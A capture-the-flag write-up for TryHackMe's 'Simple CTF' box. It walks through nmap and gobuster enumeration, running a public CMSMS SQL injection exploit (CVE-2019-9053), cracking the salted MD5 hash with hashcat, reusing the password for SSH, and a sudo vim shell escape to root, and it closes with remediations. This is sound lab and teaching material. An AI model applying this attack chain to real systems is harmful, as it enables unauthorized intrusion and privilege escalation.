Today's problem is: https://tryhackme.com/room/easyctf
Challenge Overview: Machine: Simple CTF (THM) Path: Enumeration -> CMSMS SQL Injection (CVE-2019–9053) -> Hash Extraction & Cracking -> SSH Password Reuse -> Misconfigured Sudo (vim NOPASSWD) -> Root Shell Key Takeaway: Outdated web applications, weak password hashing with credential reuse, and overly permissive sudo configurations can be chained together to escalate from web exploitation to full root compromise.
The following entry was added to the /etc/hosts file to simplify hostname-based interaction with the target system:
<TARGET_IP> easy.thmThe initial enumeration phase was started by performing a full port scan against the target machine using Nmap. The following commands were executed to identify open ports and active services:
nmap -p- --open <TARGET_IP>
nmap -sC -sV -p <OPEN_PORTS> <TARGET_IP>
┌──(root㉿vbox)-[~]
└─# nmap -p- --open easy.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 16:09 IST
Nmap scan report for easy.thm (10.48.152.251)
Host is up (0.086s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 523.34 seconds
┌──(root㉿vbox)-[~]
└─# nmap -sC -sV -p 21,80,2222 easy.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 16:26 IST
Nmap scan report for easy.thm (10.48.152.251)
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.149.224
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.78 secondsThe scan revealed that FTP, HTTP and SSH services were running on ports 21, 80 and 2222 respectively.
The scan results revealed that an anonymous FTP login was enabled. As no login credentials were present, further enumeration focused on publicly accessible services, i.e., FTP and HTTP.
The FTP service did not reveal any useful information, as it continuously attempted to establish data connections over dynamically allocated ports, which were blocked.
Repeated attempts to list directory contents resulted in connection timeouts. Passive and active modes were toggled, but the issue persisted. Consequently, FTP enumeration was abandoned.Therefore, it functioned as a rabbit hole.
┌──(root㉿vbox)-[~]
└─# ftp easy.thm
Connected to easy.thm.
220 (vsFTPd 3.0.3)
Name (easy.thm:root): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||44465|)
ls -la
^C
receive aborted. Waiting for remote to finish abort.
ftp> ls -la
229 Entering Extended Passive Mode (|||41611|)
ftp: Can't connect to `10.48.152.251:41611': Connection timed out
200 EPRT command successful. Consider using EPSV.
^C
421 Service not available, user interrupt. Connection closed.
ftp> passive
Passive mode: on; fallback to active mode: on.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
Not connected.
ftp> ls -la
Not connected.
ftp> exitA directory enumeration scan was performed against the HTTP service using Gobuster to identify any hidden or restricted endpoints.
┌──(root㉿vbox)-[~]
└─# gobuster dir -u http://easy.thm/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://easy.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 305] [--> http://easy.thm/simple/]
/server-status (Status: 403) [Size: 296]
Progress: 220557 / 220557 (100.00%)
===============================================================
Finished
===============================================================The endpoint /simple was discovered.
The main webpage displayed the default Ubuntu Apache page; however, the
/simpleendpoint revealed that the CMS in use was CMS Made Simple (CMSMS) version 2.2.8, which is vulnerable to an SQL injection vulnerability (CVE-2019-9053), details of which can be found here:
Details regarding this vulnerability are available in the Exploit Database. The exploit code provided there was saved as code.py.
The exploit was executed using:
python2 code.py -u "http://easy.thm/simple/" -w /usr/share/wordlists/rockyou.txtThe -crack option may also be used, but it consumes significant time. Therefore, it was determined to be more efficient to extract the hash and crack it using Hashcat.
The exploit revealed:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: {REDACTED}It reveals a username and a password hash and the email of the user.
The hash and salt were saved in a file named hash.txt, and Hashcat was executed:
┌──(root㉿vbox)-[~/Desktop/easy]
└─# cat hash.txt
<HASH>:<SALT>
┌──(root㉿vbox)-[~/Desktop/easy]
└─# hashcat -m 20 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344389
* Bytes.....: 139921538
* Keyspace..: 14344389
<HASH>:1dac0d92e9fa6bb2:{REDACTED}
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: <HASH>:1dac0d92e9fa6bb2
Time.Started.....: Sun Feb 15 17:45:27 2026 (0 secs)
Time.Estimated...: Sun Feb 15 17:45:27 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1430.1 kH/s (0.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7168/14344389 (0.05%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 0/14344389 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: armando -> hola123
Hardware.Mon.#01.: Util: 13%
Started: Sun Feb 15 17:45:14 2026
Stopped: Sun Feb 15 17:45:28 2026The password for the user mitch was successfully recovered. This demonstrated classic password reuse, as the recovered CMS password was valid for SSH access.
SSH login was performed on port 2222, and thenthe shell was stabilized using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
┌──(root㉿vbox)-[~/Desktop/easy]
└─# ssh mitch@easy.thm -p 2222
The authenticity of host '[easy.thm]:2222 ([10.48.152.251]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:16: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[easy.thm]:2222' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
mitch@easy.thm's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
mitch@Machine:~$ whoami
mitchThe user flag can be obtained from the "/home/mitch" directory:
mitch@Machine:~$ ls
user.txt
mitch@Machine:~$ cat user.txt
<<USER_FLAG>>
mitch@Machine:~$Enumeration of the
/homedirectory revealed another user namedsunbath.
mitch@Machine:~$ cd /home
mitch@Machine:/home$ ls
mitch sunbathFor privilege escalation, the sudo permissions of mitch were enumerated:
sudo -l
mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vimIt was determined that the user could execute vim with sudo privileges without requiring a password. This represents a classic privilege escalation technique.
A root shell was spawned using:
mitch@Machine:~$ sudo /usr/bin/vim -c ':!/bin/bash'
root@Machine:~# whoami
rootThe root flag can be obtained from the "/root" directory:
root@Machine:~# cd /root
root@Machine:/root# ls
root.txt
root@Machine:/root# cat root.txt
<<<ROOT_FLAG>>> !!!Remediations:
- Upgrade CMS Made Simple to a patched version (≥ 2.2.10) and apply input sanitization and prepared statements to eliminate SQL injection vulnerabilities such as CVE-2019–9053.
- Disable anonymous FTP access on vsftpd and restrict unnecessary services to prevent unauthenticated enumeration and reduce the external attack surface.
- Enforce strong password policies and prohibit password reuse across services (CMS and SSH), and replace legacy MD5-based hashing with modern adaptive hashing algorithms such as bcrypt or Argon2.
- Restrict sudo privileges by removing NOPASSWD access to
/usr/bin/vim, as interactive editors allow shell escapes and direct root shell spawning.
We are done with the machine……….
Let's move to the next, till then Have a good day (night too)